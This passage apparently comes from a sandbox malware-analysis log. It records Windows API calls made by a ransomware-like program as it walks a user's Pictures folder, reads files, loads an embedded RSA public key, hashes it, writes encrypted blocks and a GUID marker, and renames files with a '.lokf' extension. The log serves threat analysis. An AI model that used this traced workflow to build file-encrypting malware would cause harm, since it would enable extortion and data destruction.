(HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0059.122] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0059.122] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0059.122] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0059.122] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329e1f0 | out: hHeap=0x660000) returned 1 [0059.122] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f5f0 [0059.122] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278ec0 | out: hHeap=0x660000) returned 1 [0059.122] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4c) returned 0x3261058 [0059.122] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278ec0 [0059.122] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f908 [0059.122] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f70 [0059.122] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6acc8 [0059.122] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f70 | out: hHeap=0x660000) returned 1 [0059.122] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f70 [0059.122] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f00 [0059.122] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f20 [0059.122] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f50 [0059.122] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f60 [0059.122] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f40 [0059.122] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f10 [0059.122] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6b448 [0059.122] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f00 | out: hHeap=0x660000) returned 1 [0059.123] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f00 [0059.123] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f70 | out: hHeap=0x660000) returned 1 [0059.123] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f70 [0059.123] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f80 [0059.123] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f90 [0059.123] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278fa0 [0059.123] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c6b460 [0059.123] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f90 | out: hHeap=0x660000) returned 1 [0059.123] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x18) returned 0x32425c8 [0059.123] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f80 | out: hHeap=0x660000) returned 1 [0059.123] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6b430 [0059.123] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278fa0 | out: hHeap=0x660000) returned 1 [0059.123] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c6ac68 [0059.123] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f70 | out: hHeap=0x660000) returned 1 [0059.123] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f70 [0059.123] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f40 | out: hHeap=0x660000) returned 1 [0059.123] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6ad10 [0059.123] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f70 | out: hHeap=0x660000) returned 1 [0059.123] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6ad40 [0059.123] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f20 | out: hHeap=0x660000) returned 1 [0059.123] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c6b478 [0059.123] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6ad10 | out: hHeap=0x660000) returned 1 [0059.123] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c6ad10 [0059.123] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6ad40 | out: hHeap=0x660000) returned 1 [0059.123] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f20 [0059.123] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278ec0 | out: hHeap=0x660000) returned 1 [0059.123] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x3240c48 [0059.123] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f20 | out: hHeap=0x660000) returned 1 [0059.123] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1c) returned 0x328e3b0 [0059.123] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b448 | out: hHeap=0x660000) returned 1 [0059.123] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c6b448 [0059.123] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f00 | out: hHeap=0x660000) returned 1 [0059.123] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x204) returned 0x9c71640 [0059.123] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6acc8 | out: hHeap=0x660000) returned 1 [0059.123] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x108) returned 0x32453f0 [0059.124] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6ad10 | out: hHeap=0x660000) returned 1 [0059.124] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x210) returned 0x32947b0 [0059.124] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e3b0 | out: hHeap=0x660000) returned 1 [0059.124] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10c) returned 0x326a688 [0059.124] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f50 | out: hHeap=0x660000) returned 1 [0059.124] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x108) returned 0x3245508 [0059.124] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b448 | out: hHeap=0x660000) returned 1 [0059.124] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x32949c8 [0059.124] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0xd2f1, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0059.124] WriteFile (in: hFile=0x5cc, lpBuffer=0x326f4e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x326f4e8*, lpNumberOfBytesWritten=0x9f4fb50*=0x100, lpOverlapped=0x0) returned 1 [0059.124] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0059.124] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9f4fb50*=0x26, lpOverlapped=0x0) returned 1 [0059.124] CloseHandle (hObject=0x5cc) returned 1 [0059.125] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8940 [0059.125] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x890) returned 0x3268798 [0059.125] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\EOWcS-b-pHU1wro7.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\eowcs-b-phu1wro7.jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\EOWcS-b-pHU1wro7.jpg.lokf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\eowcs-b-phu1wro7.jpg.lokf")) returned 1 [0059.126] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd01e38b0, ftCreationTime.dwHighDateTime=0x1d4c7d5, ftLastAccessTime.dwLowDateTime=0xcb2471c0, ftLastAccessTime.dwHighDateTime=0x1d4ceb6, ftLastWriteTime.dwLowDateTime=0xcb2471c0, ftLastWriteTime.dwHighDateTime=0x1d4ceb6, nFileSizeHigh=0x0, nFileSizeLow=0xb22b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="G4kJhdDGPq3zd 8N.png", cAlternateFileName="G4KJHD~1.PNG")) returned 1 [0059.127] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x50) returned 0x3261058 [0059.127] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8720 [0059.127] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\G4kJhdDGPq3zd 8N.png") returned=".png" [0059.127] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\G4kJhdDGPq3zd 8N.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\g4kjhddgpq3zd 8n.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0059.127] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9f4fb40 | out: lpFileSize=0x9f4fb40*=45611) returned 1 [0059.127] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3700000 [0059.129] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0xb205, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0059.129] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9f4fb78, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb78*=0x26, lpOverlapped=0x0) returned 1 [0059.130] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 [0059.130] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9f4fb70, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb70*=0xb22b, lpOverlapped=0x0) returned 1 [0059.130] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0059.130] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f2) returned 0x32afc78 [0059.130] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0059.130] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0059.130] CryptAcquireContextW (in: phProv=0x9f4fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9f4fa50*=0x6b8940) returned 1 [0059.131] CryptCreateHash (in: hProv=0x6b8940, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9f4fa58 | out: phHash=0x9f4fa58) returned 1 [0059.131] CryptHashData (hHash=0x327cb80, pbData=0x32afc78, dwDataLen=0x1f2, dwFlags=0x0) returned 1 [0059.131] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x0, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9f4fa54) returned 1 [0059.131] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x11) returned 0x3242688 [0059.131] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x3242688, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x3242688, pdwDataLen=0x9f4fa54) returned 1 [0059.131] GetLastError () returned 0x0 [0059.131] CryptDestroyHash (hHash=0x327cb80) returned 1 [0059.131] CryptReleaseContext (hProv=0x6b8940, dwFlags=0x0) returned 1 [0059.131] UuidCreate (in: Uuid=0x9f4fa48 | out: Uuid=0x9f4fa48) returned 0x0 [0059.131] UuidToStringA (in: Uuid=0x9f4fa48, StringUuid=0x9f4fa40 | out: StringUuid=0x9f4fa40) returned 0x0 [0059.131] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0059.131] RpcStringFreeA (in: String=0x9f4fa40 | out: String=0x9f4fa40) returned 0x0 [0059.132] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x9c78728, Size=0x218) returned 0x9c71640 [0059.132] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x558) returned 0x32947b0 [0059.132] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0xb22b, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0059.132] WriteFile (in: hFile=0x5cc, lpBuffer=0x326f4e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x326f4e8*, lpNumberOfBytesWritten=0x9f4fb50*=0x100, lpOverlapped=0x0) returned 1 [0059.132] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0059.132] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9f4fb50*=0x26, lpOverlapped=0x0) returned 1 [0059.132] CloseHandle (hObject=0x5cc) returned 1 [0059.133] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8940 [0059.133] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x890) returned 0x3268798 [0059.133] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\G4kJhdDGPq3zd 8N.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\g4kjhddgpq3zd 8n.png"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\G4kJhdDGPq3zd 8N.png.lokf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\g4kjhddgpq3zd 8n.png.lokf")) returned 1 [0059.134] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe5fb3fe0, ftCreationTime.dwHighDateTime=0x1d4cf62, ftLastAccessTime.dwLowDateTime=0x309e1e50, ftLastAccessTime.dwHighDateTime=0x1d4ca45, ftLastWriteTime.dwLowDateTime=0x309e1e50, ftLastWriteTime.dwHighDateTime=0x1d4ca45, nFileSizeHigh=0x0, nFileSizeLow=0xfbfe, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="H4Ti7A LHpB.png", cAlternateFileName="H4TI7A~1.PNG")) returned 1 [0059.135] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x50) returned 0x3261058 [0059.135] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x76) returned 0x3289860 [0059.135] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\H4Ti7A LHpB.png") returned=".png" [0059.135] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\H4Ti7A LHpB.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\h4ti7a lhpb.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0059.135] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9f4fb40 | out: lpFileSize=0x9f4fb40*=64510) returned 1 [0059.135] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3700000 [0059.137] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0xfbd8, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0059.137] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9f4fb78, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb78*=0x26, lpOverlapped=0x0) returned 1 [0059.138] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0059.138] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9f4fb70, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb70*=0xfbfe, lpOverlapped=0x0) returned 1 [0059.138] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0059.138] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f2) returned 0x32afc78 [0059.138] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0059.138] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0059.138] CryptAcquireContextW (in: phProv=0x9f4fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9f4fa50*=0x6b8720) returned 1 [0059.139] CryptCreateHash (in: hProv=0x6b8720, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9f4fa58 | out: phHash=0x9f4fa58) returned 1 [0059.139] CryptHashData (hHash=0x327cb80, pbData=0x32afc78, dwDataLen=0x1f2, dwFlags=0x0) returned 1 [0059.139] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x0, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9f4fa54) returned 1 [0059.139] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x11) returned 0x3242688 [0059.139] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x3242688, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x3242688, pdwDataLen=0x9f4fa54) returned 1 [0059.139] GetLastError () returned 0x0 [0059.139] CryptDestroyHash (hHash=0x327cb80) returned 1 [0059.139] CryptReleaseContext (hProv=0x6b8720, dwFlags=0x0) returned 1 [0059.139] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32afc78 | out: hHeap=0x660000) returned 1 [0059.139] UuidCreate (in: Uuid=0x9f4fa48 | out: Uuid=0x9f4fa48) returned 0x0 [0059.140] UuidToStringA (in: Uuid=0x9f4fa48, StringUuid=0x9f4fa40 | out: StringUuid=0x9f4fa40) returned 0x0 [0059.140] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0059.140] RpcStringFreeA (in: String=0x9f4fa40 | out: String=0x9f4fa40) returned 0x0 [0059.140] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0059.140] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 [0059.140] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xfc00) returned 0x9c83710 [0059.140] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0059.140] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257208 | out: hHeap=0x660000) returned 1 [0059.140] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f0) returned 0x32995a0 [0059.140] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0059.140] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f0) returned 0x32afc78 [0059.140] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x58) returned 0x3296560 [0059.140] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x9c832b0 [0059.140] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6b430 [0059.140] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x9c832f8 [0059.140] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6b448 [0059.140] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6b478 [0059.140] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6ad10 [0059.140] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6b490 [0059.140] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x24) returned 0x32a08a0 [0059.140] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x158) returned 0x9c78728 [0059.140] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x9c78728, Size=0x218) returned 0x9c71640 [0059.140] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x558) returned 0x32947b0 [0059.140] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b478 | out: hHeap=0x660000) returned 1 [0059.140] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b490 | out: hHeap=0x660000) returned 1 [0059.140] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6ad10 | out: hHeap=0x660000) returned 1 [0059.141] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32a08a0 | out: hHeap=0x660000) returned 1 [0059.141] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32947b0 | out: hHeap=0x660000) returned 1 [0059.141] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6ad10 [0059.141] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f60 [0059.141] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c6b490 [0059.141] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x18) returned 0x32425c8 [0059.141] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x9) returned 0x9c6b478 [0059.141] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f40 [0059.141] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10e) returned 0x326a688 [0059.141] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e3b0 [0059.141] 